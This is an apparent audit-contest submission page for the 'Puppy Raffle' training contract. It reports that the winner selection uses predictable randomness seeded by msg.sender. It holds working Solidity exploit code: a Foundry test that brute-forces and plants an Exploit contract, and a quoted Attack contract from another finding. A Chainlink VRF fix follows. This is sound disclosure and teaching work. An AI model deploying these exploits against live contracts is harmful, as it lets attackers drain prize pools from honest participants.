Puppy Raffle
AI First Flight #1
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Previous Next
Submission Details
Severity: high
Valid

[H-01] Weak randomness in `selectWinner`: attacker-controlled `msg.sender` allows guaranteed winner manipulation

cthan

[H-01] Weak randomness in selectWinner: attacker-controlled msg.sender allows guaranteed winner manipulation

Description

selectWinner selects the raffle winner using on-chain pseudo-randomness derived in part from msg.sender:

// PuppyRaffle.sol:128-129
uint256 winnerIndex =
uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;
address winner = players[winnerIndex];

selectWinner is external with no access control (line 125) — any caller may invoke it once the timer elapses. Of the three hash inputs, msg.sender is fully attacker-controlled: the attacker authors a contract whose address feeds the hash. Combined with selectWinner's permissionless call, the attacker can deploy contracts (or use CREATE2 with chosen salts) until one produces a winnerIndex that lands on their own entry, then call selectWinner from that contract — guaranteed to win.

The same weakness appears at line 139 for rarity selection (keccak256(msg.sender, block.difficulty) % 100), letting the attacker also force LEGENDARY rarity. Same root cause, same mitigation.

Risk

  • Likelihood: High — exploit is mechanically trivial, low cost (gas for a few failed retries), works every round.

  • Impact: High — attacker drains 80% of the prize pool plus receives the winner NFT.

  • Risk = High

Impact

The protocol's core "fair lottery" property is broken. On every raffle round, any attacker willing to deploy a contract can guarantee themselves the 80% prize pool. Honest participants pay entrance fees with effectively zero chance of winning.

Proof of Concept

Foundry test using vm.etch to plant an Exploit contract at a precomputed address whose hash satisfies keccak256(addr, ts, diff) % 4 == attackerIndex. Brute-force found the address in 3 attempts at players.length = 4 (~4 expected).

function test_RNG_attacker_controls_winner() public {
// ARRANGE: 4 players entered; attacker is at index 3.
address[] memory players = new address[](4);
players[0] = makeAddr("p0");
players[1] = makeAddr("p1");
players[2] = makeAddr("p2");
players[3] = attackerWallet;
vm.deal(address(this), 4 ether);
raffle.enterRaffle{value: 4 ether}(players);
vm.warp(block.timestamp + 1 days + 1);
// Brute-force a candidate address whose hash lands on attackerIndex (3).
address exploitAddr;
for (uint256 salt = 0; salt < 100; salt++) {
address candidate = address(uint160(uint256(keccak256(abi.encode(salt)))));
uint256 idx = uint256(keccak256(abi.encodePacked(
candidate, block.timestamp, block.difficulty
))) % 4;
if (idx == 3) { exploitAddr = candidate; break; }
}
require(exploitAddr != address(0), "no winning candidate found");
// Plant minimal Exploit bytecode at the precomputed address.
vm.etch(exploitAddr, type(Exploit).runtimeCode);
// ACT: invoke selectWinner from the planted Exploit.
uint256 attackerBalanceBefore = attackerWallet.balance;
Exploit(exploitAddr).attack(address(raffle));
// ASSERT: attackerWallet received 80% prize + 1 NFT.
assertEq(attackerWallet.balance - attackerBalanceBefore, 3.2 ether);
assertEq(IERC721(address(raffle)).balanceOf(attackerWallet), 1);
}
contract Exploit {
function attack(address raffle) external {
(bool ok, ) = raffle.call(abi.encodeWithSignature("selectWinner()"));
require(ok);
}
}

Test passes (forge exit 0). attackerWallet gains 3.2 ETH (= 4 × 1 ETH × 80%) and receives the winner NFT.

Recommended Mitigation

On-chain randomness from msg.sender + block fields is structurally broken — no parameter tweak fixes it. Delegate randomness to Chainlink VRF v2 so the random value cannot be precomputed or influenced by the caller:

import "@chainlink/contracts/src/v0.8/VRFConsumerBaseV2.sol";
import "@chainlink/contracts/src/v0.8/interfaces/VRFCoordinatorV2Interface.sol";
contract PuppyRaffle is ERC721, Ownable, VRFConsumerBaseV2 {
VRFCoordinatorV2Interface immutable COORDINATOR;
uint256 public requestId;
bool public drawPending;
function selectWinner() external onlyOwner {
require(block.timestamp >= raffleStartTime + raffleDuration, "Raffle not over");
require(players.length >= 4, "Need at least 4 players");
require(!drawPending, "Draw already pending");
drawPending = true;
requestId = COORDINATOR.requestRandomWords(keyHash, subscriptionId, 3, 200_000, 1);
}
function fulfillRandomWords(uint256 _requestId, uint256[] memory randomWords) internal override {
require(_requestId == requestId && drawPending, "Stale fulfillment");
uint256 winnerIndex = randomWords[0] % players.length;
// ...rest of distribution; rarity also derived from randomWords[0]
drawPending = false;
}
}

Two-step asynchronous draw: selectWinner requests randomness, fulfillRandomWords resolves the winner with VRF-verified randomness the attacker cannot predict or influence. Adding onlyOwner to selectWinner is defense-in-depth — removes the call-spam vector even though VRF makes the per-block exploit infeasible.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 2 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!